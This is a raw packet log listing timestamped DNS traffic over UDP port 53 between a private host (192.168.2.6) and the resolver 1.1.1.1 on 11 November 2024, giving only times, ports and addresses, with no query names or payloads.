Nov 11, 2024 18:14:00.195862055 CET	53	59630	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.196727991 CET	53	51964	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.196969986 CET	53	53900	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.197247028 CET	53	59777	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.198575020 CET	53	53277	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.199012995 CET	53401	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.200150013 CET	63192	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.200335979 CET	62522	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.201688051 CET	54062	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.201850891 CET	51917	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.202034950 CET	53	51524	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.202295065 CET	54003	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.202891111 CET	51187	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.202965021 CET	53	57875	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.203485966 CET	53	57100	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.207715034 CET	51088	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.208252907 CET	60787	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.208803892 CET	63157	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.209033966 CET	62824	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.209100962 CET	49714	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.209821939 CET	53	53401	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.210192919 CET	53	58707	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.210429907 CET	53	65223	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.210983992 CET	53	54062	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.210999012 CET	53	63192	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.211344004 CET	53	62522	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.212433100 CET	53	51917	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.213169098 CET	53	51187	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.217710018 CET	53	51087	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.218369007 CET	53	62824	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.218461037 CET	53	60787	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.218653917 CET	53	51088	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.220813990 CET	53	65300	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.222218990 CET	53	49808	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.223381996 CET	53	64094	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.232839108 CET	53	54003	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.239805937 CET	53	63157	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.240217924 CET	53	49714	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.388649940 CET	50160	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.401257992 CET	53	50160	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.529186010 CET	55823	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.529993057 CET	58317	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.536406040 CET	57902	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.536807060 CET	60558	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.536961079 CET	49328	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.537256002 CET	59082	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.537615061 CET	56969	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.538388968 CET	54300	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.539943933 CET	61705	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.540098906 CET	53	55823	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.542184114 CET	64641	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.543396950 CET	55268	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.543874025 CET	52150	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.546772957 CET	53	49328	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.546792984 CET	53235	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.546901941 CET	53	56969	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.547077894 CET	53	57902	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.547420025 CET	53	59082	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.548616886 CET	53	54300	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.549880028 CET	53	61705	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.550021887 CET	49234	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.550240040 CET	57761	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.550463915 CET	64883	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.550649881 CET	55107	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.552043915 CET	53	64641	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.554055929 CET	53	55268	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.554261923 CET	53	52150	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.554840088 CET	65361	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.559469938 CET	55316	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.560620070 CET	53	58317	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.561579943 CET	53	55107	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.565184116 CET	54806	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.565979958 CET	55256	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.566083908 CET	53	55316	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.568245888 CET	53	65361	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.569298983 CET	53	60558	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.570353031 CET	61082	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.578298092 CET	60024	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.578412056 CET	53	53235	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.579005957 CET	53	61082	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.581978083 CET	53	64883	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.582061052 CET	54421	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.582256079 CET	62111	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.582446098 CET	53	49234	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.584387064 CET	53	57761	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.584709883 CET	61104	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.585167885 CET	56456	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.586076975 CET	53	60024	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.588975906 CET	57819	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.589302063 CET	60272	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.589302063 CET	52880	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.592231035 CET	53	54421	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.592736959 CET	53	62111	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.595134974 CET	53	61104	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.595628023 CET	53	56456	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.597170115 CET	53	55256	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.597182989 CET	53	54806	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.599422932 CET	53	60272	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.601656914 CET	53	52880	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.620265961 CET	53	57819	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.626348019 CET	51640	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.626981020 CET	57766	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.627137899 CET	55323	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.627351999 CET	56466	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.627439976 CET	58642	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.627602100 CET	52383	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.632127047 CET	65183	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.632548094 CET	59384	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.632797956 CET	58081	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.632896900 CET	63376	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.632980108 CET	62084	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.633162022 CET	54750	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.633208036 CET	55211	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.633414030 CET	61094	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.633552074 CET	58863	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.633670092 CET	54712	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.633707047 CET	49924	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.633867979 CET	61628	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.634033918 CET	52954	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.634093046 CET	62969	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.634284973 CET	59657	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.634329081 CET	62419	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.634485006 CET	59555	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.634948015 CET	52505	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.635057926 CET	62121	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.636550903 CET	53	51640	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.636714935 CET	53	52383	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.636730909 CET	53	55323	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.637145042 CET	53	58642	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.637737036 CET	53	57766	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.638371944 CET	53	56466	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.638593912 CET	62190	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.639377117 CET	64076	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.639981985 CET	51054	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.640515089 CET	63980	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.641654015 CET	53	55211	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.643069983 CET	53	65183	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.643081903 CET	53	61628	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.643209934 CET	53	61094	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.643405914 CET	53	59384	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.643428087 CET	53	58081	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.643440962 CET	53	54750	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.644258022 CET	53	54712	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.644431114 CET	53	58863	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.644922972 CET	53	62084	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.644964933 CET	53	59555	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.645587921 CET	53	62121	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.646339893 CET	53	52505	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.649609089 CET	53	51054	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.650280952 CET	53	62190	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.665348053 CET	53	63376	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.665364981 CET	53	59657	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.665375948 CET	53	62969	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.665532112 CET	53	52954	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.666069984 CET	53	49924	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.666431904 CET	53	62419	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.669719934 CET	53	64076	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.673799992 CET	53	63980	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.686985016 CET	60361	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.688565969 CET	59560	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.693178892 CET	60231	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.693430901 CET	60755	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.693830013 CET	64559	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.696722984 CET	53	60361	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.702121973 CET	53	60231	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.703988075 CET	53	64559	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.704516888 CET	53	60755	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.720397949 CET	53	59560	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.789741993 CET	64258	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.790185928 CET	53354	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.799074888 CET	53	64258	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.800930023 CET	53	53354	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.915404081 CET	62611	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.916722059 CET	50495	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.927270889 CET	53	50495	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.932902098 CET	52263	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:00.940826893 CET	53	52263	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.947240114 CET	53	62611	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:00.999866009 CET	59887	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:01.000544071 CET	49204	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:01.001142979 CET	58263	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:01.001619101 CET	60232	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:01.004625082 CET	61924	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:01.006161928 CET	60499	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:01.388360023 CET	53	49204	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:01.389508009 CET	53	58263	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:01.409917116 CET	53	60232	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:01.411253929 CET	53	60499	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:01.412233114 CET	53	61924	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:01.412761927 CET	53	59887	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:01.446196079 CET	56811	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:01.447060108 CET	51351	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:01.447773933 CET	50261	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:01.448240995 CET	65144	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:01.456971884 CET	53	56811	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:01.458178997 CET	53	50261	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:01.460014105 CET	53	65144	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:01.460880995 CET	53	51351	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:01.666158915 CET	50520	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:01.675733089 CET	53	50520	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:01.799571037 CET	55752	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:01.803633928 CET	56289	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:01.811359882 CET	52250	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:01.811852932 CET	57043	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:01.812227964 CET	65070	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:01.812697887 CET	58175	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:01.812959909 CET	62996	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:01.813452959 CET	53020	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:01.813676119 CET	52653	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:01.814276934 CET	55365	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:01.814480066 CET	53	56289	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:01.814768076 CET	53691	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:01.815385103 CET	56667	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:01.815591097 CET	49221	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:01.818540096 CET	53	55752	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:01.820705891 CET	53	52250	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:01.822150946 CET	53	65070	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:01.822488070 CET	53	58175	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:01.824016094 CET	53	53691	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:01.827260017 CET	53	56667	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:01.828432083 CET	53	55365	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:01.832281113 CET	53	62996	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:01.834765911 CET	53	52653	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:01.846474886 CET	53	57043	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:01.847373962 CET	53	49221	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:01.847387075 CET	53	53020	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:01.908212900 CET	51392	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:01.909981966 CET	52997	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:01.923877001 CET	53	52997	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:01.940433979 CET	53	51392	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:01.952126026 CET	52670	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:01.952683926 CET	50493	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:01.962481976 CET	53	52670	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:01.968338966 CET	53	50493	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.001391888 CET	64452	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.003057003 CET	57776	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.003829956 CET	55727	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.005373955 CET	64676	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.007469893 CET	62960	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.009541035 CET	59927	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.010463953 CET	58731	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.010905981 CET	49884	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.011624098 CET	64222	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.011692047 CET	60455	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.011918068 CET	57032	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.012105942 CET	52731	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.012284994 CET	52686	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.012489080 CET	58327	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.012689114 CET	57811	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.012876034 CET	53	64452	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.012901068 CET	53131	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.013128996 CET	55361	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.013257027 CET	50916	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.013501883 CET	49934	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.013817072 CET	50681	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.014141083 CET	60040	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.014209986 CET	53	55727	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.014709949 CET	53	64676	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.017158031 CET	53	62960	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.020744085 CET	53	59927	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.020813942 CET	53	58731	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.021929979 CET	53	52731	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.022098064 CET	53	52686	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.022934914 CET	53	57811	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.023665905 CET	53	58327	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.023864031 CET	53	50681	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.024270058 CET	53	50916	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.024589062 CET	53	60040	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.025404930 CET	53	55361	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.036211967 CET	53	57776	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.042006016 CET	53	49884	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.042639017 CET	53	64222	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.043493986 CET	53	57032	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.045104027 CET	53	53131	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.045239925 CET	53	60455	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.046154976 CET	53	49934	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.068459988 CET	62447	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.074038982 CET	51580	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.078608036 CET	55733	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.082644939 CET	53	62447	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.088435888 CET	64282	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.090764999 CET	55844	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.090951920 CET	50921	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.091115952 CET	60920	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.091494083 CET	54821	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.091636896 CET	62748	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.091778994 CET	62472	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.091918945 CET	51408	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.092053890 CET	49860	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.092200994 CET	53852	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.092327118 CET	53795	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.092478037 CET	56133	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.093683004 CET	50612	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.093888998 CET	60628	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.094439983 CET	54638	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.096237898 CET	62941	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.096395969 CET	57062	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.098684072 CET	53	49860	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.100579977 CET	53	60920	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.100981951 CET	53	54821	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.101484060 CET	53	50921	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.101950884 CET	53	62472	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.102128983 CET	53	53852	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.102200985 CET	53	56133	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.102893114 CET	53	51408	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.102905035 CET	53	50612	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.103434086 CET	53	62941	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.104222059 CET	53	54638	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.104245901 CET	53	60628	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.104257107 CET	53	53795	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.108189106 CET	53	51580	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.110074043 CET	53	55733	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.121434927 CET	53	55844	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.123353004 CET	53	62748	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.123691082 CET	53	64282	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.127336979 CET	53	57062	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.869986057 CET	62852	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.871819973 CET	63028	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.873728991 CET	59820	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.874281883 CET	55175	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.874614954 CET	55237	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.874902010 CET	58024	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.875474930 CET	65401	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.875597000 CET	50344	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.876231909 CET	55091	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.876980066 CET	52255	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.877547979 CET	56689	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.877625942 CET	52893	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.878165007 CET	53214	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.878197908 CET	60886	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.878804922 CET	55051	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.880897999 CET	58153	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.881268978 CET	53	62852	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.881531000 CET	57829	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.882221937 CET	58578	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.882708073 CET	57178	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.883508921 CET	53	59820	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.883635044 CET	58594	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.883817911 CET	63507	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.883991003 CET	53	63028	1.1.1.1	192.168.2.6
